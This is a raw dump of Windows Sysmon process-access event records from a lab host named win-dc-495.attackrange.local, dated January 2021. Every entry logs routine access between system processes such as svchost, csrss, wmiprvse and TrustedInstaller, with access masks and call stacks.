13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.867{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f967|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+3844|C:\Windows\SYSTEM32\psmserviceexthost.dll+146dc|C:\Windows\SYSTEM32\psmserviceexthost.dll+f903|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.867{59A5CD1D-93F9-6005-F204-00000000A301}42963788C:\Windows\system32\sihost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+47ca8|C:\Windows\System32\modernexecserver.dll+47c41|C:\Windows\System32\modernexecserver.dll+19c8a|C:\Windows\System32\modernexecserver.dll+1f6f8|C:\Windows\SYSTEM32\twinapi.appcore.dll+32a67|C:\Windows\SYSTEM32\twinapi.appcore.dll+32870|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000011747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\
RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
